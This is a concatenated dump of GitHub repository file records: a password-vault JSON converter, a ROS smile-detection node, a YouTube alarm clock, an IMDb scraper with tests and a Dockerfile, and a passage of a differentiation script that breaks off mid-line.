"de76fdac325c7180cb1f32688dc2c6e1fe607ec2", "content_id": "dab6cdc0ea19de7c1f83ad16bc97ba1fda2a22d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 199, "license_type": "no_license", "max_line_length": 68, "num_lines": 12, "path": "/Changelog.md", "repo_name": "jvteleco/Enpass-JSON-to-Bitwarden-converter-fix", "src_encoding": "UTF-8", "text": "# Changelog\nAll notable changes to this project will be documented in this file.\n\n\n## [0.0.1] - 2020-04-26\n### Added\n- Created Changelog.md\n- First version of python script\n\n### Changed\n\n### Removed\n" }, { "alpha_fraction": 0.5420600771903992, "alphanum_fraction": 0.5491416454315186, "avg_line_length": 35.12403106689453, "blob_id": "04e488d58b3e3102c97e2c9abcdb41cec19ba7e6", "content_id": "69bef44893d9729916c0603e4d810c5a664bc694", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4660, "license_type": "no_license", "max_line_length": 130, "num_lines": 129, "path": "/EnpassJson_Bitwarden_converter.py", "repo_name": "jvteleco/Enpass-JSON-to-Bitwarden-converter-fix", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n#-----------------------------------------------------------------------\n# EnpassJson_Bitwarden_converter.py\n# AUTHOR: JVTELECO\n# v1.0 26/04/2020\n#-----------------------------------------------------------------------\n\n\"\"\"\nThis EnpassJson_Bitwarden_converter.py script allows to fix the hidden fields of \nthe Bitwarden Json file after importing an Enpass JSON.\n\"\"\"\n\n\n\nimport traceback\nimport json\n\n\nEnpassFileName=\"Enpass_vault.json\"\nBitwardenFileName=\"Bitwarden_exported.json\"\n\nitems_processed = 0\nitems_processed_changed = 0\n\nprint(\"Opening Enpass file\")\nwith open(EnpassFileName, encoding=\"utf8\") as f:\n json_data_enpass = json.load(f)\n \n##print(json_data) \n#print(json.dumps(json_data_enpass, indent = 2))\n##print(json.dumps(json_data, indent = 2, sort_keys=True))\n\nprint(\"Opening Bitwarden file\")\nwith open(BitwardenFileName,encoding=\"utf8\") as f_bt:\n json_data_bitwarden = json.load(f_bt)\n \n\n \nfixed_file= open('Fixed_DELETE.txt', 'w')\n \n##print(json_data) \n#print(json.dumps(json_data_bitwarden, indent = 2))\n##print(json.dumps(json_data, indent = 2, sort_keys=True))\n\n\n\n\nlong_json_data_enpass_items = len(json_data_enpass[\"items\"])\nlong_json_data_bitwarden_items = len(json_data_bitwarden[\"items\"])\nprint(\"Enpass number items:\", long_json_data_enpass_items )\nprint(\"Bitwarden number items:\", long_json_data_bitwarden_items)\n\nprint(\"\\n\\n Starting comparison...\\n\\n\")\n\nfor i in range(0, long_json_data_enpass_items):\n\n item_enpass = json_data_enpass[\"items\"][i]\n item_enpass_title = item_enpass[\"title\"]\n# print(\"\\nENPASS:\\t\\t\", item_enpass_title)\n \n for j in range(0, long_json_data_bitwarden_items):\n item_bitwarden = json_data_bitwarden[\"items\"][j]\n item_bitwarden_name = item_bitwarden[\"name\"]\n if item_enpass_title == item_bitwarden_name:\n# print(\"Bitwarden:\\t\", item_bitwarden_name)\n #Now check for sensitive items\n #print(json.dumps(item_enpass, indent = 2))\n #print(json.dumps(item_bitwarden, indent = 2))\n \n #we now only the items in the fields that are the custom fields\n try:\n# if (1):\n for k in range(0, len(item_bitwarden[\"fields\"])):\n field_bitwarden=item_bitwarden[\"fields\"][k]\n #print(field_bitwarden)\n \n \n #we now check the name against the Enpass item\n #when there is a match, need to check the sensitive value\n #if it is '1', need to change the bitwarden item type to '1' so it is hidden\n for m in range(0, len(item_enpass[\"fields\"])):\n field_enpass=item_enpass[\"fields\"][m]\n if field_bitwarden[\"name\"] == field_enpass[\"label\"]:\n# print(\"MATCH\")\n# print(field_bitwarden)\n# print(field_enpass)\n #print(type(field_enpass[\"sensitive\"]))\n #print(type(field_bitwarden[\"type\"]))\n if field_enpass[\"sensitive\"] == 1:\n field_bitwarden[\"type\"] = 1\n items_processed_changed = items_processed_changed + 1\n #print(\"CHANGED:\\t\", field_bitwarden)\n fixed_file.write(str(item_bitwarden_name))\n fixed_file.write(\"\\t\")\n fixed_file.write(str(field_bitwarden))\n fixed_file.write(\"\\n\")\n \n \n \n \n \n items_processed=items_processed+1\n #end clause of: if item_enpass_title == item_bitwarden_name:\n except Exception as e:\n #probably if a bitwarden does not have custom fields, will throw an exception of \"fields\" KeyError, does not exist\n ##print(e)\n# print(\"ERROR Bitwarden:\\t\", item_bitwarden_name)\n# print(traceback.format_exc())\n pass\n \n \nprint(\"\\n\\n Finised comparison.\\n\\n\")\n\n\n\nprint(\"Enpass number items:\", long_json_data_enpass_items )\nprint(\"Bitwarden number items:\", long_json_data_bitwarden_items)\nprint(\"Number of items processed with custom fields\", items_processed)\nprint(\"Number of fields fixed to hidden\", items_processed_changed)\n\n\n\n\nwith open('Bitwarden_fixed.json', 'w') as json_file:\n json.dump(json_data_bitwarden, json_file, indent = 2)\n \n \nfixed_file.close()\n" } ]
3
KhairulIzwan/smile_detection
https://github.com/KhairulIzwan/smile_detection
22ef3e6f6ba76f91d75799832c392cbac3ab82d1
18c0444956473317f48cc6e72e32e4c93488f4f6
b905647d2ddbe9db28d51001bb5906052e528302
refs/heads/master
2022-12-01T13:27:27.944322
2020-08-08T17:15:47
2020-08-08T17:15:47
278,263,042
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6824381947517395, "alphanum_fraction": 0.7009803652763367, "avg_line_length": 26.438596725463867, "blob_id": "b4f359b58ff3ba958a2e604ff5ce94afda9ab0d6", "content_id": "6c069f5db6fd4d9c3552f789ea528a8a229cbc03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4692, "license_type": "no_license", "max_line_length": 79, "num_lines": 171, "path": "/script/smile_detection.py", "repo_name": "KhairulIzwan/smile_detection", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom __future__ import print_function\nfrom __future__ import division\n\n# import the necessary ROS packages\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import CameraInfo\n\nimport rospy\n\nimport cv2\n\nfrom cv_bridge import CvBridge\nfrom cv_bridge import CvBridgeError\n\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.models import load_model\n\nimport time\nimport rospkg\nimport os\nimport numpy as np\n\nclass SmileDetector:\n\n\tdef __init__(self):\n\n\t\trospy.logwarn(\"SmileDetector node [ONLINE]\")\n\n\t\tself.bridge = CvBridge()\n\t\tself.rospack = rospkg.RosPack()\n\n\t\tself.image_recieved = False\n\t\tself.face_detected = False\n\n\t\trospy.on_shutdown(self.shutdown)\n\n\t\t## load the face detector cascade and smile detector CNN\n\t\t# Import haarCascade files\n\t\tself.p = os.path.sep.join([self.rospack.get_path('common_face_application')])\n\t\tself.libraryDir = os.path.join(self.p, \"model\")\n\n\t\tself.haar = self.libraryDir + \"/haarcascade_frontalface_default.xml\"\n\n\t\t# Path to input Haar cascade for face detection\n\t\tself.faceCascade = cv2.CascadeClassifier(self.haar)\n\n\t\t# Import model files\n\t\tself.p = os.path.sep.join([self.rospack.get_path('smile_detection')])\n\t\tself.libraryDir = os.path.join(self.p, \"script/model\")\n\n\t\tself.model = self.libraryDir + \"/lenet_smile_detection.hdf5\"\n\n\t\tself.smile = load_model(self.model)\n\n\t\t# Subscribe to Image msg\n\t\timage_topic = \"/cv_camera/image_raw\"\n\t\tself.image_sub = rospy.Subscriber(image_topic, Image, self.cbImage)\n\n\t\t# Subscribe to CameraInfo msg\n\t\tcameraInfo_topic = \"/cv_camera/camera_info\"\n\t\tself.cameraInfo_sub = rospy.Subscriber(cameraInfo_topic, CameraInfo, \n\t\t\tself.cbCameraInfo)\n\n\t\trospy.sleep(1)\n\n\t# Get CameraInfo\n\tdef cbCameraInfo(self, msg):\n\n\t\tself.imgWidth = msg.width\n\t\tself.imgHeight = msg.height\n\n\t# Convert image to OpenCV format\n\tdef cbImage(self, msg):\n\n\t\ttry:\n\t\t\tcv_image = self.bridge.imgmsg_to_cv2(msg, \"bgr8\")\n\n\t\t\t# comment if the image is mirrored\n\t\t\tcv_image = cv2.flip(cv_image, 1)\n\t\texcept CvBridgeError as e:\n\t\t\tprint(e)\n\n\t\tself.image_recieved = True\n\t\tself.image = cv_image\n\n\tdef showImage(self, winName, img):\n\n\t\tcv2.imshow(winName, img)\n\t\tcv2.waitKey(1)\n\n\tdef putInfo(self):\n\n\t\tfontFace = cv2.FONT_HERSHEY_DUPLEX\n\t\tfontScale = 0.4\n\t\tcolor = (255, 255, 255)\n\t\tthickness = 1\n\t\tlineType = cv2.LINE_AA\n\t\tbottomLeftOrigin = False # if True (text upside down)\n\n\t\tself.timestr = time.strftime(\"%Y%m%d-%H:%M:%S\")\n\n\t\tcv2.putText(self.image, \"{}\".format(self.timestr), (10, 15), \n\t\t\tfontFace, fontScale, color, thickness, lineType, \n\t\t\tbottomLeftOrigin)\n\t\tcv2.putText(self.image, \"Sample\", (10, self.imgHeight-10), \n\t\t\tfontFace, fontScale, color, thickness, lineType, \n\t\t\tbottomLeftOrigin)\n\t\tcv2.putText(self.image, \"(%d, %d)\" % (self.imgWidth, self.imgHeight), \n\t\t\t(self.imgWidth-100, self.imgHeight-10), fontFace, fontScale, \n\t\t\tcolor, thickness, lineType, bottomLeftOrigin)\n\n\t\t# Clone the original image for displaying purpose later\n\t\tself.frameClone = self.image.copy()\n\n\tdef shutdown(self):\n\t\ttry:\n\t\t\trospy.logwarn(\"SmileDetector node [OFFLINE]\")\n\t\tfinally:\n\t\t\tcv2.destroyAllWindows()\n\n\tdef detectHaarFace(self):\n\n\t\tif self.image_recieved:\n\t\t\t# Detect all faces in the input frame\n\t\t\tself.faceRects = self.faceCascade.detectMultiScale(self.image,\n\t\t\t\tscaleFactor = 1.1, minNeighbors = 5, minSize = (30, 30),\n\t\t\t\tflags = cv2.CASCADE_SCALE_IMAGE)\n\n\t\t\t# Loop over the face bounding boxes\n\t\t\tfor (fX, fY, fW, fH) in self.faceRects:\n\t\t\t\t# Extract the face ROI and update the list of bounding boxes\n\t\t\t\tfaceROI = self.image[fY:fY + fH, fX:fX + fW]\n\n\t\t\t\t# convert it to grayscale\n\t\t\t\tgrayROI = cv2.cvtColor(faceROI, cv2.COLOR_BGR2GRAY)\n\n\t\t\t\t# resize it to a fixed 28x28 pixels, and then prepare the\n\t\t\t\t# ROI for classification via the CNN\n\t\t\t\troi = cv2.resize(grayROI, (28, 28))\n\t\t\t\troi = roi.astype(\"float\") / 255.0\n\t\t\t\troi = img_to_array(roi)\n\t\t\t\troi = np.expand_dims(roi, axis=0)\n\n\t\t\t\t# determine the probabilities of both \"smiling\" and \"not\n\t\t\t\t# smiling\", then set the label accordingly\n\t\t\t\t(notSmiling, smiling) = self.smile.predict(roi)[0]\n\t\t\t\tlabel = \"Smiling\" if smiling > notSmiling else \"Not Smiling\"\n\n\t\t\t\t# display the label and bounding box rectangle on the output\n\t\t\t\t# frame\n\t\t\t\tcv2.putText(self.image, label, (fX, fY - 10),\n\t\t\t\t\tcv2.FONT_HERSHEY_DUPLEX, 0.4, (0, 0, 255), 1)\n\t\t\t\tcv2.rectangle(self.image, (fX, fY), (fX+fW, fY+fH), \n\t\t\t\t\t(0, 255, 0), 2)\n\n\t\t\tself.putInfo()\n\t\t\tself.showImage(\"Haar Face Detector\", self.image)\n\n\nif __name__ == '__main__':\n\n\t# Initializing your ROS Node\n\trospy.init_node('smile_detector', anonymous=False)\n\tface = SmileDetector()\n\n\t# Camera preview\n\twhile not rospy.is_shutdown():\n\t\tface.detectHaarFace()\n" } ]
1
Yaambs18/Python_assignment
https://github.com/Yaambs18/Python_assignment
cf1962777aae406a80e34ee361873fe9d43b4450
de0ff4d6d848e46866ce0beb1c290a427cbcf2ad
02b1217bdf34e1c9ffff5029a7717b033b889c2f
refs/heads/main
2023-08-02T11:46:40.128512
2021-09-24T08:23:52
2021-09-24T08:23:52
407,813,476
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6037272214889526, "alphanum_fraction": 0.6084374189376831, "avg_line_length": 34.649635314941406, "blob_id": "1a5017577a7eacbf4877be6f4e83482abed002d7", "content_id": "aca1341ff0e5ca259d3e7f0b2a4c5db450701b4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4883, "license_type": "no_license", "max_line_length": 110, "num_lines": 137, "path": "/assignment1.py", "repo_name": "Yaambs18/Python_assignment", "src_encoding": "UTF-8", "text": "import requests\nimport bs4\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom string import punctuation\nimport re\nimport csv\nimport os\nimport logging\n\nlogging.basicConfig(filename=\"assignment_file.log\", format='%(asctime)s %(message)s', filemode='w')\nlogger=logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n# Fetching the Movie ids for top 5 movies\nbase_url = \"https://www.imdb.com/chart/top/\"\n\nmovies_ids = []\nmovies_synopsis = []\ndictionary_movie_data = {}\n\ndef movies_id_func(url):\n \n try:\n request_res = requests.get(url)\n soup = bs4.BeautifulSoup(request_res.text, 'lxml')\n\n for i in range(5):\n movie_id = soup.select(\".titleColumn\")[i]('a')[0]['href'][7:-1]\n movies_ids.append(movie_id)\n return movies_ids\n except requests.exceptions.ConnectionError:\n logging.error(\"Connection Error, Check your Internet connectivity\")\n except requests.exceptions.MissingSchema:\n logging.error(\"Invalid URL\")\n \n# Fetching the synposis for the above movies and storings\n\ndef movies_synopsis_func(movie_id):\n try:\n for i in movie_id:\n request_movie_link = requests.get(f\"https://www.imdb.com/title/{i}\")\n if request_movie_link.status_code == 200:\n format_response = bs4.BeautifulSoup(request_movie_link.text, 'lxml') \n movies_synopsis.append(format_response.select('.ipc-html-content')[1].getText())\n else:\n logging.info(\"Incorrect URL\")\n return movies_synopsis\n except TypeError:\n logging.error(\"None object returned\")\n\n# creating a bag of words of synopsis and addin that in the dictionary with key as film_id\n\ndef bag_of_words(string):\n try:\n stop_words = set(stopwords.words('english'))\n word_tokens = word_tokenize(string)\n filtered_sentence = [word for word in word_tokens if not word.lower() in stop_words]\n bag_of_word = ' '.join(filtered_sentence)\n return bag_of_word\n except TypeError:\n logging.error(\"Missing argument\")\n\n# api data fetching\n\ndef fetch_api_data(movie_ids):\n try:\n for id in movie_ids:\n pattern = r\"\\D{2}\\d{7}\"\n if re.compile(pattern).match(id).group()==id:\n response = requests.get(f\"http://www.omdbapi.com/?i={id}&apikey=1db04143\")\n api_info = response.json()\n try:\n dictionary_movie_data[id]['Genre'] = api_info['Genre']\n dictionary_movie_data[id]['Actors'] = api_info['Actors']\n dictionary_movie_data[id]['Title'] = api_info['Title']\n except KeyError:\n logging.error(\"json file returned None\")\n except TypeError:\n logging.error(\"Missing arguments or Unexpected argument\")\n return dictionary_movie_data\n\nfields = ['movie_id','Title', 'Synopsis', 'Genre', 'Actors']\n# csv file creation\n\ndef write_csv():\n if os.path.exists('movies_data.csv'):\n csvfile = open(\"movies_data.csv\", \"r\")\n reader = csv.DictReader(csvfile)\n for row in reader:\n for item in movies_ids:\n if row['movie_id']==item:\n dictionary_movie_data.pop(item)\n\n csvfile.close()\n if len(dictionary_movie_data)>0:\n with open(\"movies_data.csv\", \"a\") as file:\n writer = csv.DictWriter(file, fields)\n for key in dictionary_movie_data:\n writer.writerow({field: dictionary_movie_data[key].get(field) or key for field in fields})\n \n else:\n with open(\"movies_data.csv\", \"w\") as csvfile:\n writer = csv.DictWriter(csvfile, fields)\n writer.writeheader()\n for key in dictionary_movie_data:\n writer.writerow({field: dictionary_movie_data[key].get(field) or key for field in fields})\n\n\ndef fetch_movies_data():\n \n item = input(\"Enter Genre or Actor name for data fetching: \")\n if item and not item.isdigit():\n with open(\"movies_data.csv\", 'r') as file:\n reader = csv.DictReader(file)\n movie_names = []\n for row in reader:\n if item in row['Actors'] or item in row['Genre']:\n movie_names.append(row['Title'])\n return movie_names\n\n\nif __name__ == \"__main__\":\n logging.info(movies_id_func(base_url))\n logging.info(movies_synopsis_func(movies_ids))\n i = 0\n for string in movies_synopsis:\n my_punctuation = punctuation.replace(\"'\", \"\")\n new_str = string.translate(str.maketrans(\"\", \"\", my_punctuation))\n dictionary_movie_data[movies_ids[i]] = {\"Synopsis\" : bag_of_words(new_str)}\n i+=1\n\n logging.info(fetch_api_data(movies_ids))\n write_csv()\n fetched_data = fetch_movies_data()\n print(fetched_data)\n logging.info(fetched_data)" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7407407164573669, "avg_line_length": 16.272727966308594, "blob_id": "bd62fa09f6d3d1aaec2d421f3da7521c704164f3", "content_id": "d56c99479d67169da21666653a67eb4f2efba860", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 189, "license_type": "no_license", "max_line_length": 40, "num_lines": 11, "path": "/Dockerfile", "repo_name": "Yaambs18/Python_assignment", "src_encoding": "UTF-8", "text": "FROM python:3\n\nADD . .\n\nRUN pip install -r requirements.txt\n\nRUN python3 -m nltk.downloader stopwords\nRUN python3 -m nltk.downloader punkt\n\nCMD [ \"assignment1.py\" ]\nENTRYPOINT [ \"python3\" ]" }, { "alpha_fraction": 0.6762749552726746, "alphanum_fraction": 0.6917960047721863, "avg_line_length": 32.44444274902344, "blob_id": "349f0a3ec2b5af6fd9f323f4a1e4a1a4754765ba", "content_id": "13df8b1ec184dfa253ac69fcdd183a8b12ccebe3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 902, "license_type": "no_license", "max_line_length": 160, "num_lines": 27, "path": "/assignment1_unit_test.py", "repo_name": "Yaambs18/Python_assignment", "src_encoding": "UTF-8", "text": "import unittest\nimport assignment1\nimport requests\n\nfrom unittest import mock\nfrom unittest.mock import patch\n\nclass Test_assignment(unittest.TestCase):\n def test_top_movie(self):\n self.assertRaises(TypeError,assignment1.movies_id_func(\"https://www.imdb\"))\n\n def test_api_fetch(self):\n self.assertRaises(TypeError, assignment1.fetch_api_data(123))\n \n def test_synopsis_func(self):\n self.assertRaises(TypeError, assignment1.movies_synopsis_func(123))\n\n def test_bag_of_words(self):\n self.assertEqual(assignment1.bag_of_words('ram is shyam'),'ram shyam')\n\n def test_fetch_data(self):\n with mock.patch('builtins.input', return_value=\"Drama\"):\n assert assignment1.fetch_movies_data() == ['The Shawshank Redemption', 'The Godfather', 'The Godfather: Part II', 'The Dark Knight', '12 Angry Men']\n\n\nif __name__ == \"__main__\":\n unittest.main()" } ]
3
xmfm/danmaku_json2xml
https://github.com/xmfm/danmaku_json2xml
04b93379b551f4d426d3df92a8c2b9b749560f5e
19df497b11429a9fd56434edf7073303c5cfcb72
9aaf5a4775d6a45a091518e1e48bc037c3d3ee2b
refs/heads/master
2022-11-06T22:37:51.309671
2020-06-13T05:18:24
2020-06-13T05:18:24
271,806,374
7
1
null
null
null
null
null
[ { "alpha_fraction": 0.8093385100364685, "alphanum_fraction": 0.8093385100364685, "avg_line_length": 63.25, "blob_id": "e8f993109ba121c6e7d4cb1202c2d2a1b58d1215", "content_id": "7a4aff48d4ce59bb34fed2319e70ce67f7e59d22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 569, "license_type": "no_license", "max_line_length": 154, "num_lines": 4, "path": "/README.md", "repo_name": "xmfm/danmaku_json2xml", "src_encoding": "UTF-8", "text": "# 简介\n应网友托,编写此脚本,为实现将[此网站](https://matsuri.icu/)所下载的 json 格式的直播弹幕文件转换为 xml 格式的普通哔哩哔哩弹幕文件,可直接在[弹弹Play](http://www.dandanplay.com/) 播放,或转为 ass 文件在普通播放器播放,可重现直播弹幕。\n# 使用方法\n请先在电脑中安装 Python,然后将脚本文件下载到本地,在文件资源管理器中直接将待转换文件拖动到脚本文件上,若转换成功将会在 json 文件所在文件夹中生成同名 xml 文件。\n" }, { "alpha_fraction": 0.5018315315246582, "alphanum_fraction": 0.5311355590820312, "avg_line_length": 29.744186401367188, "blob_id": "5c64290b61112c98da02b3debc375fe923ecf029", "content_id": "5a58db0e039517f5a9aec80037726658a5a64658", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1403, "license_type": "no_license", "max_line_length": 99, "num_lines": 43, "path": "/danmaku_json2xml.py", "repo_name": "xmfm/danmaku_json2xml", "src_encoding": "UTF-8", "text": "import json\r\nimport xml.dom.minidom\r\nimport sys\r\nimport os\r\nimport binascii\r\n\r\n\r\ndef json2xml(json_file):\r\n if json_file[-5:] != '.json':\r\n raise KeyError\r\n xml_file = json_file[0:-4] + 'xml'\r\n with open(json_file, 'r', encoding='utf-8') as f0, open(xml_file, 'w', encoding='utf-8') as f1:\r\n json_txt = f0.read()\r\n json_dict = json.loads(json_txt)\r\n start_time = json_dict['info']['start_time']\r\n danmaku_list = json_dict['full_comments']\r\n\r\n doc = xml.dom.minidom.Document()\r\n root = doc.createElement('i')\r\n doc.appendChild(root)\r\n for danmaku in danmaku_list:\r\n if not danmaku.get('text'): # 跳过礼物\r\n continue\r\n d = doc.createElement('d')\r\n uid_crc32b = hex(binascii.crc32(str(danmaku['user_id']).encode()))[2:]\r\n p = f'{(danmaku[\"time\"]-start_time)/1000},1,25,16777215,' \\\r\n f'{danmaku[\"time\"]//1000},0,{uid_crc32b},{danmaku[\"i\"]}'\r\n d.setAttribute('p', p)\r\n d.appendChild(doc.createTextNode(danmaku['text']))\r\n root.appendChild(d)\r\n doc.writexml(f1)\r\n\r\n\r\nif __name__ == '__main__':\r\n print('正在转换文件:', sys.argv[1], '\\n')\r\n try:\r\n json2xml(sys.argv[1])\r\n except Exception:\r\n print('转换失败\\n')\r\n else:\r\n print('转换成功\\n')\r\n\r\n os.system('pause')\r\n" } ]
2
jsmith716/AlarmClock
https://github.com/jsmith716/AlarmClock
03dc0a99f20e7604b5549d4d0c9236cdc3097973
487727de27e5473973776233bd4d011656871ad7
57944dd561bb4f3b69f51a705a6493049828ee77
refs/heads/master
2021-01-12T13:27:38.398061
2017-09-24T12:17:21
2017-09-24T12:17:21
69,833,082
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6420428156852722, "alphanum_fraction": 0.6648446321487427, "avg_line_length": 40.85620880126953, "blob_id": "fee23fe8599640737213a035e15d97eeb5e0cfcc", "content_id": "b0a65aff7128bd6640087a8736cc34d4ee3283f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6403, "license_type": "no_license", "max_line_length": 176, "num_lines": 153, "path": "/AlarmClock.py", "repo_name": "jsmith716/AlarmClock", "src_encoding": "UTF-8", "text": "'''\nThis is just practice stuff.\n\nAlarm clock that plays either the top trending YouTube video or a random video \nfrom a local file named videolist.txt. The decision as to which to play is based \non user input when script is run.\nThe alarm clock does not terminate once the alarm triggers. Instead, it starts \nover so it will play a video daily until the user manually kills the script.\n\nRequirement: \n-Chrome or Firefox\n-A file named videolist.txt in same directory of script that looks something like this: \nhttps://www.youtube.com/watch?v=6NhzaWuG2wg\nhttps://www.youtube.com/watch?v=yW_oZR9a714\nhttps://www.youtube.com/watch?v=PKehlbkbO3Q\n\nThis has been tested in Python 2.7 and 3.4\n'''\nimport argparse\nimport time\nimport datetime\nimport random\nimport requests\nimport json\nimport sys\nfrom selenium import webdriver\n\n\nparser = argparse.ArgumentParser(description='Alarm Clock')\n\nparser.add_argument('-time', action=\"store\", dest=\"wake_time\", default=\"7:00 AM\", required=True,\n help=\"The time you want to wake up. Available formats are 7:00PM, '7:00 PM', 19:00 or 1900. If you use a space, you must put time in quotes - '7:00 PM' \")\n\nparser.add_argument('-type', action=\"store\", dest=\"video_type\", default=\"top\", required=False,\n help=\"Available inputs are top or random. Top will pull top trending video. Random will pull from a local videolist.txt file.\")\n\nparser.add_argument('-browser', action=\"store\", dest=\"video_browser\", default=\"Chrome\", required=False,\n help=\"Specify the browser you have on your machine. Options are Firefox or Chrome. The default is chrome.\")\n\nresults = parser.parse_args() \n\n# Turns users input into a workable time format\ndef process_time_from_user(wake_time):\n try: \n return time.strftime(\"%H%M\", time.strptime(wake_time, \"%I%M%p\")) # Looks for 12 hour format - e.g. 700PM\n except:\n pass\n try: \n return time.strftime(\"%H%M\", time.strptime(wake_time, \"%H%M\")) # Looks for 24 hour format - e.g. 1900\n except:\n print (\"\\nI did not understand the time you entered. \\nPlease enter in these formats: \\n\\n\\t 7:00AM \\n\\t '7:00 AM' \\n\\t 2100 \\n\\t 21:00\\n\\n\")\n raise # Added this to exit out of the script. https://docs.python.org/2/tutorial/errors.html#user-defined-exceptions\n\n\n# Selects random video from file videolist.txt. Re-opens file every time in the event that you want to change videos in videolist.txt without exiting the script \ndef play_local_video():\n video_list = list()\n with open('videolist.txt', 'r') as f:\n for lines in f:\n video_list.append(lines)\n \n play_video(random.choice(video_list), 60) # Sets the video to play for 60 seconds\n\n\n# Gets yesterdays top YouTube trending YouTube video. \n# We could use this to dump all the videos to a file for later use \n# THIS DOESN\"T WORK ANYMORE - NEED TO TRANSITION TO API!!!\ndef play_top_video():\n # Sets date to two days ago since I'm not sure how soon the previous days videos are available\n dates = (datetime.date.today() - datetime.timedelta(2)).strftime(\"%Y%m%d\")\n\n # Used http://curl.trillworks.com to convert curl command pulled from chrome's dev tools\n headers = {\n 'Origin': 'http://www.google.com',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',\n 'Accept': '*/*',\n 'Referer': 'http://www.google.com/trends/hotvideos',\n 'Proxy-Connection': 'keep-alive'\n }\n\n data = \"hvd=\"+dates+\"&geo=US&mob=0&hvsm=0\"\n\n req = requests.post('https://www.google.com/trends/hotvideos/hotItems', headers=headers, data=data)\n\n mydic = json.loads(req.text)\n top_video = mydic['videoList'][0]['url'] # Maybe make this random rather than the top\n video_length = mydic['videoList'][0]['length']\n video_play_time = convert_video_duration(video_length)\n \n play_video(top_video, video_play_time)\n\n\n# Converts video duration from YouTube to seconds so we can control how long the video plays\n# Was going to use time, but this seemed simpler for what was needed\ndef convert_video_duration(video_length):\n if len(video_length) <= 2:\n return video_length\n elif len(video_length) == 4: # Stop at 9 minutes \n return (int(video_length[0]) * 60 + int(video_length[2:]))\n else:\n return 60 # Defaults to 60 seconds if duration is greater than 9:59\n\n\n# Plays video for specified amount of time\ndef play_video(url, duration):\n video_browser = results.video_browser.title()\n \n if video_browser == 'Firefox':\n browser = webdriver.Firefox()\n else: \n browser = webdriver.Chrome() #Default back to chrome in case someone enters something other than firefox or chrome\n\n browser.get(url)\n time.sleep(8) # changed this to 8 seconds to account for video start time\n # Skip ad after 5 seconds if option is available\n try:\n browser.find_element_by_class_name('videoAdUiSkipButton').click()\n except:\n pass\n time.sleep(duration)\n browser.quit()\n\n\nalarm = process_time_from_user(results.wake_time.replace(\":\", \"\").replace(\" \", \"\")) # Clean up input so it is easier to work with\nvideo_type = results.video_type.lower()\n\nif \"JOHN\" in video_type:\n print(\"DELETE THIS. THIS IS PRACTICE.\")\n\nwhile True:\n current_time = time.strftime(\"%H%M\")\n if alarm != current_time:\n #print(current_time)\n sys.stdout.write(\"\\rIt is now \" + current_time + \". Your alarm is set to go off at \" + alarm) # http://stackoverflow.com/a/5291323/4393950\n time.sleep(15) # Only sleep for 15 seconds in the event that your pc goes to sleep at any time during the day\n elif alarm == current_time:\n sys.stdout.write(\"\\rIt is now \" + current_time + \". Alarm is going off now!!! \") # http://stackoverflow.com/a/5291323/4393950\n\t\t\n # In the event that one fails, try the other\n if video_type == \"top\":\n try: \n play_top_video()\n except:\n play_local_video()\n elif video_type != \"top\":\n try:\n play_local_video()\n except:\n play_top_video()\n time.sleep(60)" } ]
1
benlvn/Differentiatie
https://github.com/benlvn/Differentiatie
dbca7b282c8b4ebcd0b26454e3f44b953018879a
57becccce062ef550dce366ef192c8116a00d3f7
25493853fc45b22297a21c1568d5cdc5879c9688
refs/heads/master
2015-09-26T11:45:47.717191
2015-09-23T03:23:08
2015-09-23T03:23:08
42,975,935
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6562384963035583, "alphanum_fraction": 0.6705925464630127, "avg_line_length": 31.74698829650879, "blob_id": "47e698c50247d650cb184a856bd895f709b42b24", "content_id": "8f71034b273183da02712ac3b9799f223b6c7a7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2717, "license_type": "no_license", "max_line_length": 95, "num_lines": 83, "path": "/differentiate.py", "repo_name": "benlvn/Differentiatie", "src_encoding": "UTF-8", "text": "def negative2tilde(expression,direction):\n\tresult = ''\n\tif direction == 'f' or direction == 'forward':\n\t\tfor ind,char in enumerate(expression):\n\t\t\tif char == '-' and (ind == 0 or expression[ind-1] in '(^*-+='):\n\t\t\t\tresult += '~'\n\t\t\telse:\n\t\t\t\tresult += char\n\tif direction == 'r' or direction == 'reverse' or direction == 'b' or direction == 'backward':\n\t\tfor char in expression:\n\t\t\tif char == '~':\n\t\t\t\tresult += '-'\n\t\t\telse:\n\t\t\t\tresult += char\n\treturn result\n\ndef differentiate(expression,respect_to):\n\tif '=' in expression:\n\t\t#Create a list of indicies where the equals signs are\n\t\tequals_positions = [0]\n\t\tfor ind,char in enumerate(expression):\n\t\t\tif char == '=':\n\t\t\t\tequals_positions += [ind,ind+1]\n\t\tequals_positions += [len(expression)]\n\t\t\n\t\t#Create a list of expressions between the equals signs\n\t\texpressions = []\n\t\tfor i in range(0,len(equals_positions),2):\n\t\t\texpressions += [expression[equals_positions[i]:equals_positions[i+1]]]\n\t\t\n\t\t#Attach 